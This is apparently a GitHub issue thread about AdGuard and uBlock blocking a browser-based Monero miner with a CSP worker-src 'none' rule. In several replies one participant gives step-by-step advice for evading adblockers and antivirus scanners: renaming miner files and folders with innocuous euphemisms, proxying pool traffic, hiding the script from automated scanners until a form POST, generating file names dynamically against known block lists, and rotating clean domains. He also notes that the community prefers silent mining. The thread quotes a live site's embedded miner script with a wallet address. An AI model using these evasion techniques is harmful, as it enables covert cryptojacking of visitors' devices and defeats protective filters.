Adguard Blocks worker-src through content security policy
hitmanex opened this issue · comments
adguard is overriding the documents content security policy with worker-src 'none';
Refused to create a worker from 'blob:<URL>' because it violates the following Content Security Policy directive: "worker-src 'none'".
yes it works but only cause your domain isn't on the adguard filtering list.
Type:
CSP
Rule:
$csp=worker-src 'none',
Filter:
AdGuard French filter
theres about 500 targeted domains in this filter
Ah. Well I don't speak on behalf of @notgiven688 but I suspect he would say this isn't his problem.
IMO Silent mining days are coming to the end with the changes to WASM in the active tab only and Brave being more popular than ever.
As this is most of my focus with what I do, I can give a couple recommendations:
- Get a clean domain.
- Install the JS files locally to that domain
- Rename all the files and directors so there is no mention of mining, monero, webmin, or any thing that can be scanned automated (use euphanism all sites would use or could not be banned like employee, worker, scheduler etc for the files). This includes folders as I notice using a folder /miner/ gets blocked automatically by a lot of programs.
- Use a proxy to the pools as most of them are blocked anyways by AV and adblockers
- Have a soft consent system or regulate who the code gets exposed to.
This last suggestion isn't really followed by the community as they all want to do silent mining, but either you do it or get your site black listed.
Although I would highly suggest having some sort of user acknowledgement (could be in your GDPR message) you should never expose the js automatically because it seems that it gets scanned for.
So you should check to see what kind of browser is asking to see the page and then if its a real one, then have some system to not immediately expose the code.
Generally, AV scanners and companies will not scan a site by brute forcing POSTs so in MoneroShare.io's case it doesn't expose the js until a get is done via the form.
Yeah someone can manually report it but I suspect most reports that go through get put through an automated queue so when it does get checked it loads the page and if it doesn't see malware it goes on to the next one in the queue.
Make sense?
Sadly, if your site is already on a list there isn't much you can do, but so far most of mine have avoided this simply by following the above steps.
Now there are some who get more volume and don't really care if they are blocked because they are mobile users are mobile and Apple would never install an ablocker on Safari least Google would have a fit (though the mobile browsers do come with their own set of problems if you look in other issues)
My site has a setting that people enable to turn on mining..its a user option.
adguard has blocked EVERY worker-src by overriding my own server header...
i don't do silent mining. that filter seems to be a "broad" filter
you have any ideas how i can override their worker-src none; header?
Where at the js files stored?
To prevent 3rd party site blocks it should be the site the users are on with https://firstpartyserver.com/js/worker.js
I forgot to mention you need to use the raw js files for this so you can rename it (not the compressed version) and still have the link between the two. On occasion you need to rename the reference between I think the miner.js to something else in the in the file itself.
I made a note to myself last fork what I needed to change:
VidYen/VidYen-WordPress-Plugins#151 (comment)
Since its a wordpress install system the js folder may be anything so I use some php to find it but if you don't use that, then just hard code that js function. The key issue is that if you rename the file to avoid the word miner then you must change that reference.
Also, make sure your webminer websocket server is using the wss:// as some things don't like unecrypted websockets
Aslo if you host the js files on another url, its not guaranteed to work they will be blocked by browsers and adblockers sometimes as they less friendly to that method (it's what Coinhive did so they blocked it that way)
it blocks all workers by overriding worker-src to none..none workers of any type work on the domain.
I noticed on firefox it uses web sockets (wss) and on chrome it uses blob:...this makes it much easier to block on chrome since worker-src none applies to all workers of any type (even if its not mining related)
Hrm... Question does your site work on Brave or Chrome with just Ublock installed?
If it does, this might be an issue that is only targeting a small amount of your user base. Unless for some reason all your users have Adguard installed.
As in... There is no way in hell I can get around Firefox NoScript suite, but its so rare for someone to have that installed, I don't think its worth my time fighting.
If it's just adguard, perhaps you could do the reverse of my recommendation and then try to load the js files on a url that isn't blocked? Again, you'd have to check to see if Adguard behavior is detected or the JS fails to load and then try that... Which at that point, I'm not sure if its worth it.
no its the same filter with ublock, "*^$csp=worker-src 'none'"
this worker-src: none, i cant figure out how to get around it since its "stricter" and CSP defaults to any stricter settings so my server header doesnt override it
Hrm... Without doxing yourself can you give the file structure and the locations of the page that the user sees versus the url of where the js files are stored?
I might be able to think of something based on how that is setup.
this isn't my site just one that triggered the same filter i confirmed in the console log.
https://www.300mbfilms.co , notice the console log Failed to construct 'Worker': Access to the script at 'blob
<script src="https://polskota.club/sadig6.js"></script>
--
| <script>
| server = "wss://polskota.club:8181"
| startm("moneroocean.stream","4AdtEZQDyBWN4r7pvHZCqtKPThHkzoq7XUWadmBAhstyHi6tmmp69yCiMSgFcD6DmvAbTNz2UbXirQuMQesQVzJsCv2QULg");
| </script>
its offsite
Allright.
Which one of the sites in on the Adguard list? The 300mb or polskota or both?
the 300mb site..it detects the domain name, polskota isnt there...you can see the source just like me
its not my site...its a random site thats in the ublock and adguard filter...
it makes no difference where the js files are, look at the ublock and adguard logs to see what gets blocked. the actual domain
Wait. Are you hosting the js files on a site you don't own? Or the js files are on your site but the other site isn't one you own?
If Adguard isn't blocking all js files on your site and it didn't block my site by default then it means it's not the webminer itself per se, but something with your naming convention or file location.
If I hosted something from moneromining.com it would be blocked because of the domain name.
If I put it on MoneroShare.io and put it in a folder called /mining/ or had a file named mining.js it will get blocked.
However, unless its blocking all javascript and wasm on that site, then then all you need to do is host it locally but name it something that isn't being blocked.
I have noticed ad blockers will block anything in folders named /banners/ or banner.png as well so you have to name it something that isn't a keyword.
Unless the application is blocked everything on that site (which uBlock did Coinhive with as it won't even load html unless you click ignore or whitelist) and unfortunately that's not really something you can by pass unless you try to be smart with a curl call which I have done before.
Any attempts to host js files not local to the site gets blocks just like most ads get blocked, but being highly suspicious to those files first and begrudging accepting the local files.
I mean that's what Facebook does to shove ads in your face... They had to embed with the same address as the content itself.
dude, its just a random site from the block filter that i picked as an example..it has nothing to do with me
it doesnt matter where anything is hosted since the domain is blocked..just look at the filter logs of ublock or adguard and you'll see the filter triggered
You said, adguard doesn't block my MoneroShare.io
Ergo, its not the base code causing it and I've already explained how to avoid most adblock and AV software.
Unless it does, then I will investigate further as this is a hobby of mine to avoid being blocked by everything.
Otherwise, unless @notgiven688 wants to chime in, I feel that continuing this discussion won't help you any further.
adguard and ublock are blocking using worker-src:none; tag. which blocks all workers even not related to this project. Once your domain is listed on their filter they use that block method..
@notgiven688
@hitmanex Even if you host the worker on a different domain? Okay, thank you for the info. I leave the issue open for anyone to reply.
edit: any chance it works with the "uncompressed" form of the miner in the SDK?
@notgiven688 worker-src:none; is domain based and overrides all CSP headers already set since CSP favors "stricter" and none is the strictest..
all workers get blocked, its not even this project related. you cant use any web workers at all once your domain is in their filter
But a new domain? I mean that's what I would do. I own 50 and half of them I don't use.
If Coinhive couldn't convince them to take them off the list, I don't think any of us can.
The main issue so you don't have to keep buying new domains is to use my methods above to avoid being put on that list in the first place.
switching domains is too spammy for me..domains build reputation over time and when you have a good alexa rank and google indexing its not reasonable to just switch domains
I suppose Coinhive felt the same way, but in the end they had to close down.
The internet was decentralized for a reason. I suggest you take advantage of it and stop relying on Google for your income.
And I don't mean to be snarky, but there is some lack of knowing how the internet works here.
If your favored well reputationed site has been blacklisted... Its not that hard to have a second server with a clean name and then direct users to go via a link (as well as link the accounts via some sort of Oauth) to that if they want to earn some rewards and then your blemished server talked to the clean server for the mining stats to give them rewards.
I already do that with some games for clients where they have an ads and mining site and then the game on another site because it had to run with a different back end which they talk back and forth with cURL which clients will never see (and should not) by passing the block systems.
And the game currency gets transferred from the mining site to the game site as long as the users have the same emails on both servers.
Unless your users are fickle and you are just trying to mine them for the 30 seconds they are on your site before they close the browser... Then sorry... That's probably why you were blacklisted.
I also dont mean to be snarky, but when i say "reputable site" with a good alexa rank, im talking 200k unique visitors a day. I'm not gonna transfer people around to random sites because some crappy filter decided it would add it to the list..
There is no lack of knowing how the internet works, since you couldn't even properly debug the 300mb example site...
average user time on the site is 30 minutes to 2 hours. I was blacklisted because the site is large...
BTW did you try the uncompressed version like NotGiven suggested?
You can't really edit the compressed version because... Well... Its compressed... And I need to do specific things with the miner which I just leave it raw.
I never used the compressed so it never dawned on me to ask if you used that and then removed all the wording of miners out of the 3 files and modified the sizes... If you look at the adblock list, there are the js files it specifically looks for.
This is what I'm talking about... I put an index in there to prevent directory snooping as well.
Although the js files themselves contain the word miner, the files themselves do not (although I get a lot of false positives with Windows Defender when I'm editing my code locally)
Do javascript and/or WASM games get blocked under the same domain? I mean if they don't you could just change the code to be similar.
And if it were me I'd see if I could run a web assembly games as well... If WASM games run just fine, you just have to modify the code just enough to not look like what they are blocking.
If the WASM games fail to run, then there is nothing else you can do technological wise.
You can just ask the users to turn off AdGuard and write a script prevent them from accessing the content until they do...
Or if you want the carrot method instead of the stick... Give them rewards for turning it off like these users do for the gaming sites I work for.
I mean you don't have to mine... But the users that do will have a better advantage over the players that don't.
And if they are ideological opposed to earning in game currency with mining, there are the ads options.
I mean its not that hard to whitelist a site in options... Much easier than attempting to do what Coinhive tried to do with way more resources than of us and fail at.
To add... If its specifically because you got so many users one of them keeps reporting the js files and I was the one running the site...
I'd use something like code-igniter to just dictionary make up the file names and directories with php or some other dynamic server side creation.
Bonus points if it checks the known block list first.
@hitmanex Okay, I read the CSP documentation. If worker-src is strictly set to 'none' we are in trouble. I do not see a way to get around it at the moment.
@VidYen thank u for trying to help but i came to the same conclusion as @notgiven688 ..
worker-src:none; is a very strong header..i wasn't really looking for help since i couldnt get around it myself i just mentioned it here so people would know about it